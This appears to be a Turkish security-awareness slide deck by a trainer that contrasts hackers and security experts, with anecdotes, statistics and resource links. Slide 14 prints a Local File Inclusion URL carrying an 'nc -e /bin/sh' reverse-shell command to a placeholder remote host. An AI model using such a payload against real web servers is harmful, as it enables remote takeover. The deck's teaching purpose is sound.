Hackerların Gözünden Bilgi Güvenliği
- 2. Ben kimim?
• Bilgi güvenliği Uzmanı & Denetci
• Siber güvenlik danışmanı(VS)
• Güvenlik eğitmeni
– www.guvenlikegitimleri.com
• Blogger
– www.lifeoverip.net
- 4. Siber Dünyada Güvenlik
• Sosyal yaşam vs Siber Yaşam
• Obama’nın dilinden siber güvenlik
• It’s been estimated that last year alone cyber
criminals stole intellectual property from
businesses worldwide worth up to $1 trillion.
• In short, America’s economic prosperity in the
21st century will depend on cyber security.
4
- 6. Hacker / güvenlik uzmanı
• Güvenlik uzmanları prosedürel hareket ettiği için
hackerlara göre bir adım geriden gelir.
• Güvenlik uzmanları için koruma bir meslek, hackerlar
için bu korumaları aşmak bir zevktir.
• Hacker için bilgi güvenliği diye bir kavram yoktur,
,
sadece aşılması gereken engel vardır
vardır!
• Hackerların mesaisi, sayısı ve motivasyonu farklıdır...
– Siber dünyada gece gündüz kavramları yoktur
– 7/24 mesai yaparlar!
• Örnek: Wordpress açıklığı
- 9. Güvenlikciler nasıl hacklenir?
• “Terzi kendi söküğünü dikemez misali” çok
konuşur, nasihat verir, korkutur ama kendileri
uymaz(genelleme)
• Kevin Mitnick, Dan Kaminsky, Symantec,
Kaspersky
- 14. Resim üzerinden sistemi ele geçirme
+Local File Inclusion
http://hackme.com/wp-contents/photos/huzi.jpg?x=nc -e /bin/sh uzak_sistem.com 80
- 15. STS mi SYS mi?
• Saldırı Tespit sistemleri nasıl hacklenir?
– Güvenlik uzmanına STS kur denir...
– Uzman STS cihazını alır kurar ve internete açar
• Bir müddet sonra STS cihazı dönüşüm geçirir ve saldırı yapmaya
başlar.
• STS neden d��nüşüm geçirmiştir?
– Hediye ☺
•
•
STS= Saldırı Tespit Sistemi
SYS=Saldırı Yapma Sistemi
- 16. Ateş etmeyi bilmezseniz ayağınızı
vurabilirsiniz!
• Güvenlik uzmanına iş verilir: Firewall’dan
DDOS koruma için rate limitingi aktif et!
– Güvenlik uzmanı hemen şu kuralı yazar: aynı ipden
200’den fazla istek gelirse kara listeye al!
• Hacker kaynak ip adresi olarak dns sunucuyu
verir (ya da router’in ip adresini)
– Firma kendi engelleme sistemiyle kendini
engellemiş olur!
- 18. Yalnız değilsiniz, günde en az bin
ziyaretciniz var!
ADSL Abonesi, haftalık aldığı
saldırı sayısı 20.000(600
farklı saldırı tipi)
- 19. Yamasız Windows kullanımı = Zombi
Türkiye’de ortalama 100.000 zombi
makine bulunmakta!
• Yamasız bir Windows’un internete açıldıktan
sonra ele geçirilme süresi ortalama 6.45
dakika...
- 22. Türkiye güvenliğe ne kadar önem
veriyor?
•
•
•
•
Güvenlik firmaları %80 oranında açık
Hosting/ISP’ler %60 oranında
Üniversiteler %85 oranında
Devlet/kamu sistemleri %55
- 24. Kaynaklar
• Haftalık güvenlik bülteni:
– www.lifeoverip.net/newsletter
• Ağ ve bilgi güvenliği listesi
– www.lifeoverip.net/netsec-listesi
•
•
•
•
•
www.guvenlikegitimleri.com
www.bilgiguvenligi.gov.tr
www.Beyazsapka.org
www.Lifeoverip.net
www.webguvenligi.org